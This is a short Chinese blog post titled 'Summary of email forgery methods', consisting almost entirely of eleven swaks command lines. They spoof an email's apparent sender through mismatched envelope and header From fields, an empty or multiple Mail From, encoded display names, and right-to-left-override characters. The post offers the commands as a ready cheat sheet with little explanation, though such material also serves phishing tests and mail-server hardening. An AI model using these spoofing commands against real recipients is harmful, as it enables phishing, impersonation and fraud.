美文网首页
邮件伪造方法总结

邮件伪造方法总结

作者: Lucifer1993 | 来源:发表于2021-08-16 11:06 被阅读0次
0x01 mail From头与认证用户的用户名不一致
swaks -t target@example.com -b "test" -f faker@example.com  -s server@example.com -au USERNAME -ap PASSWORD
0x02 邮件From头和Mail From头之间不一致
swaks -t target@example.com -f faker@example.com --h-From: '"admin"<admin@example.com>'
0x03 空的Mail From头
swaks -t target@example.com -f " " --h-From: '"admin"<admin@example.com>'
0x04 多级From头
swaks -t target@example.com -f "hr@example.com" -f "hrbak@example.com" --h-From: '"admin"<admin@example.com>'
0x05 From头有多个地址
swaks -t target@example.com -f admin@example.com --h-From:'"admin" <admin@example.com>', '"admin2"<admin2@example.com>' -e server@example.com
0x06 解析具有不一致性的攻击
swaks -t target@example.com -f test1@example.com:test2@example.com --h-From:'"admin"<admin@example.com>'
0x07 基于编码的伪造攻击
swaks -f admin@example.com  -t target@example.com --h-From:'=?utf-8?B?57up5pWI566h55CG?= <admin@example.com>'
0x08 子域攻击
swaks -t target@example.com -f admin@example.com --f-From:'"admin"<admin@example.com>'
0x09 未经授权的转发攻击
swaks -t target@example.com -f admin@example.com --body "test" --h-X-Mailer google.com --server server@example.com -p 2525 -au USERNAME -ap PASSWORD
0x10 缺少UI渲染攻击
swaks -t target@example.com -f admin@example.com --h-From:'admin@go@ogle.com'
0x11 RTL覆盖攻击
swaks -t target@example.com -f admin@example.com --h-From:'\u202emoc.a@\u202dalice'

相关文章

  • 邮件伪造方法总结

    0x01 mail From头与认证用户的用户名不一致 0x02 邮件From头和Mail From头之间不一致...

  • 邮件伪造和SPF

    之前看了下邮件伪造觉得挺有意思的,所以看了下邮件伪造的东西,下面简单的总结了一下,如果有不妥的地方还望大佬们提出来...

  • 钓鱼邮件的伪造

    kali上的swaks工具 swaks --to xxxx@qq.com --from info@freebuf....

  • 端口漏洞整理

    端口漏洞描述21FTP弱密码22SSH弱密码23telnet弱密码25邮件伪造,vrfy/expn查询邮件用户信息...

  • 伪造邮件钓鱼与apt工具

    完成伪造邮件发送试验 要想查看一个域名是否配置了SPF,可以用nslookup或者dig查看: nslookup ...

  • 【职场英语】

    总结平时,开会,写邮件,以及阅读中学到的native表达方法。 进展:时间:So far, to date, up...

  • Android检测虚拟机的方法

    Android检测虚拟机的方法 安卓模拟器检测的方法有很多,一些简单的信息能通过软件伪造,但是全方位多维度的伪造就...

  • 解决“您在 /var/spool/mail/root 中有邮件”

    用 mail 命令可以查看你有多少邮件未读 删除邮件 方法一:禁止系统检查邮件 方法二:用logWatch转发邮件...

  • Binder Hook

    寻找Hook点 伪造一个ActivityManagerNative系统服务对象,让asInterface()方法返...

  • web hacking 101 csrf

    简介 跨站请求伪造(csrf)攻击发生在恶意的网站,邮件,短信,应用等当中。csrf 攻击会使得一个已经认证过或者...

网友评论

      本文标题:邮件伪造方法总结

      本文链接:https://www.haomeiwen.com/subject/yqljbltx.html